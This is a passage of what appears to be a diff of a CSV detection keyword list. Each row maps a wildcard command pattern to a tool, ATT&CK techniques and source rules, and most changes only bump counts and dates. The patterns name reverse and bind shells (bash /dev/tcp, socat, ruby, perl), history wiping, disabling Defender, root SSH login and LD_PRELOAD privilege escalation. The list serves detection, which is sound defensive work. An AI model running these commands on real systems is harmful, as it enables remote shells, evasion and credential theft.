kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*rmmod --remove*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*rm .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rm /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rm /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rm -f backpipe* mknod /tmp/backpipe p && nc *","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rmmod --remove*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*root/SecurityCenter2* -ClassName AntiVirusProduct*","greyware_tool_keyword","powershell","list AV products with powershell","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" "*RouterScan.exe*","greyware_tool_keyword","routerscan","Router Scan is able to find and identify a variety of devices from large number of known routers on your internal network","T1046 - T1083 - T1018 - T1116","TA0007 - TA0010 - TA0003","N/A","N/A","Network Exploitation tools","https://en.kali.tools/?p=244","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*rsync -r * *@*:*","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*rsync -r *@*:* *","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*rundll32*.dll*a*/p:*","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*rundll32*.dll*a*/p:*","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*rundll32*.dll*StartW*","greyware_tool_keyword","rundll32","Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.","T1218.005 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","1","0","greyware tool - risks of False positive !","N/A","10","1224","189","2022-07-14T07:15:10Z","2021-01-01T16:44:42Z" "*sc config WinDefend start= disabled*","greyware_tool_keyword","shell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*sc0tfree/updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*sc0tfree/updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" "*schtasks /query /v /fo LIST*","greyware_tool_keyword","schtasks","view detailed information about all the scheduled tasks.","T1053.005 - T1082","TA0004 - TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*scout aws --profile default -f*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*scout azure --cli*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -1007,21 +1047,21 @@ "*screen /dev/ttyACM0 115200*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*server*-relay.screenconnect.com*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*set history +o*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*set history +o*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","7","1","88","10","2023-09-13T20:39:02Z","2022-01-11T07:34:37Z" "*Set-MpPreference -DisableIOAVProtection $true*","greyware_tool_keyword","powershell","Disable scanning all downloaded files and attachments","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableRealtimeMonitoring $true*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableScriptScanning 1 *","greyware_tool_keyword","powershell","Disable AMSI (set to 0 to enable)","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*sftp *@*:* *","greyware_tool_keyword","sftp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*sh >/dev/tcp/* <&1 2>&1*","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*sh -i >& /dev/udp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*sh >/dev/tcp/* <&1 2>&1*","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*sh -i >& /dev/udp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*shadawck/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*sharkd -a tcp:*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*shred --remove*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*shred -u*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*shred -z*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*shred --zero*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*shred --remove*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred -u*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred -z*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred --zero*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*SimpleHTTPServer.SimpleHTTPRequestHandler*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*snmp-check * -c public*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*snmpwalk -v1 -cpublic *","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" @@ -1035,23 +1075,23 @@ "*socat -O /tmp/*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*socat TCP4-LISTEN:* fork TCP4:*:*","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*socat tcp-connect*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*socat tcp-connect:*:* exec:/bin/sh*","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*SOFTWARE\WOW6432Node\FreeFileSync*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" -"*solo_mine_example.cmd*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*solo_mine_example.cmd*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*SplashtopStreamer3500.exe* prevercheck *","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*src/xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*src\xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*src/xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*src\xmrig.cpp*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*ssh @ssh.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *","greyware_tool_keyword","wmic","WMIC suspicious transfer ","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*strings -n * /dev/mem | grep -i pass*","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*sudo apache2 -f /etc/shadow*","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sudo LD_LIBRARY_PATH=. apache2*","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sudo LD_PRELOAD=/tmp/preload.so find*","greyware_tool_keyword","sudo","abusinf LD_PREDLOAD option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*sudo rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks 